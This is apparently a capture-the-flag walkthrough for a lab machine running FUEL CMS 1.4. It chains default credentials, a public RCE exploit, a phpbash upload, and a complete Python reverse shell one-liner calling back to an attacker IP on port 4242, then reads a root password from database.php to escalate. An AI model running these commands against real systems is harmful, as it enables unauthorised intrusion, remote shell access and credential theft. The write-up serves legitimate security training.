Start with an nmap scan:
$ sudo nmap -A -oA nmap 10.10.194.158
The only open port is 80, a Apache/2.4.18 web server. View the web page in a browser and we find it’s the default page for FUEL CMS 1.4, which also gives us some basic info about the CMS.
A quick Gobuster scan gives us nothing particularly useful:
$ gobuster dir -u http://10.10.194.158 -w /usr/share/wordlists/dirb/common.txt
While Gobuster was running, read the CMS page. We find many config files are located in “fuel/application/config/” (such as database.php and config.php), and near the bottom it mentions a login page, /fuel, and gives default creds. Check the page and we can log in with them with full admin rights!
Browsing the Dashboard we find a few Upload areas. These could be promising.
Before going into that, start simply. Checking Searchsploit with
$ searchsploit fuel gives us “fuelCMS 1.4.1 - Remote Code Execution”. Sounds good. Copy it to our working directory with
$ searchsploit -m linux/webapps/47138.py
Edit the file so the URL in the Python script matches the box script. You’ll also need to make sure Burp Suite is open, and turn off Intercept; alternatively, remove the two references to the proxy in the script.
Then run the Python script (using Python 2, as the script is incompatible with Python 3 -
$ python 47138.py). You’ll be presented with a
cmd: prompt. Try some things, such as
cmd:whoami to determine you’re in - note you’ll have to scroll up past the rubbish to get the actual result.
This shell is horrible, though, so let’s try and upgrade it. There is a browser-based php shell called phpbash, available at https://github.com/Arrexel/phpbash/blob/master/phpbash.php. Download the raw script to your machine with
wget, set up a local server with
$ python3 -m http.server 4444, then download the file to the remote machine using
cmd:wget <your-THM-IP>:4444/phpbash.php. Then, in a browser, visit http://10.10.194.158/phpbash.php and you get a better shell.
We can further improve the shell by making it a Python one, using a script from https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/Reverse Shell Cheatsheet.md#python. Change the script to include your IP, set up a netcat listener on your machine on port 4242 with
$ nc -lvnp 4242, and when you run it (in the phpbash shell - it won’t work in the
cmd one) your netcat will give you a shell.
This is the Python reverse shell code:
www-data@ubuntu:/var/www/html#:python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.83.23",4242));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
This shell can be further upgraded, first by running
$ python3 -c 'import pty;pty.spawn("/bin/bash")', then
$ export TERM=xterm, backgrounding this shell with Ctrl-Z, then
$ stty raw -echo; fg. This gives us a nice, stable, interactive shell :)
Now we can get the first flag with
www-data@ubuntu:/var/www/html$ cat /home/www-data/flag.txt. However, access to root (
$ ls /root) is unsurprisingly denied.
We’ll need to privesc.
$ sudo -l and
$ sudo -i gives us nothing, and there are no SUIDs found with
$ find / -perm -u=s -type f 2>/dev/null
Let’s check the config files earlier, especially as one of them mentioned usernames and passwords. Change directory with
$ cd fuel/application/config, and then search all the files for the phrase “password” using grep:
$ grep -ni password *.
One result looks interesting, line 80 of “database.php”:
database.php:80: 'password' => 'mememe',.
$ cat database.php and have a read about line 80 - it suggests the password is for root!
Try it with
$ su root and the password, and success! We get a
# shell, and
# whoami confirms we’re root.
# cat /root/root.txt.